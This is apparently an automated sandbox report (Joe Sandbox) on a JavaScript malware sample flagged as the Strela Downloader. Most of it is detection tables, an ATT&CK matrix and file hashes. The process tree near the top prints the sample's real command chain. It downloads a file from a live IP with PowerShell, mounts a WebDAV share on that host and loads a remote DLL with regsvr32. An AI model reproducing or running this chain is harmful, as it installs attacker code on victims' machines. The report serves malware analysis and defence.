Windows
Analysis Report
124651728043662978.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7748 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\12465 1728043662 978.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7832 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\266 0115144213 53.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7840 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7884 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 8072 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1836 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 560 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1668,i ,173023110 9121570536 0,15511152 2568689772 4,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 916 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587747 |
Start date and time: | 2025-01-10 17:38:43 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 25s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 124651728043662978.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 2.23.242.162, 2.23.197.184, 199.232.210.172, 2.16.168.107, 2.16.168.105, 2.22.242.123, 2.22.242.11, 23.204.152.213, 23.204.152.210, 192.168.2.10, 52.149.20.212, 104.78.188.188
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
11:39:55 | API Interceptor | |
11:39:59 | API Interceptor | |
11:39:59 | API Interceptor | |
11:40:07 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8807336520256946 |
Encrypted: | false |
SSDEEP: | 1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9I:0J7adfWuK0p/QDfKoPeuP0aN4fqox7 |
MD5: | DBF6EDB829E00485DDAAAB745DF24910 |
SHA1: | C6BC82B37E0231534DABD92EBADBF582667D3424 |
SHA-256: | D5FBB8B8703EB151D5805CCF5A49172C5B92BC0BF1FC01FA89E8210A89168EF8 |
SHA-512: | 9FC3FC1FE64680E8535EF807F2F3644330C05BE6F88EA9FCA511858C5EFEAF16C675274F3966885D8EB210B2C3BB1CC441F8217521588F613E618070D776F539 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7879757888005957 |
Encrypted: | false |
SSDEEP: | 1536:vSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzAkv:vazaPv4V4fXq2UaB |
MD5: | B56422E1A6C3E0DDD4B0EB0F31C5290F |
SHA1: | 4932B156BF09EDBFF9F0E78280C3E7D3BBF85397 |
SHA-256: | E9D82D8E21CD09EC20AE9F6856C4006874EB6136DF0BCDEB9487914BBD6819E8 |
SHA-512: | 13A052966BAAD1305759C2EE10E0F574E2681D7F81A52EB4F7B597312FC9FF80BDE0988B84E9A2CBF3A174CD693485A939B110CEF9B903ABA7342A165029DE39 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07920543331968263 |
Encrypted: | false |
SSDEEP: | 3:JXyKYeSnJWLXlVG0+q2Iqe8lLq1vE1lollNTt/4ll/Q6beV/:VyKzKkGE8lSvJHtc6V |
MD5: | 6F6FFA26F458F0E187CC67AF8E683DA0 |
SHA1: | 205B6B515754E0F96E02466AF76F9B8C0EC2C3E3 |
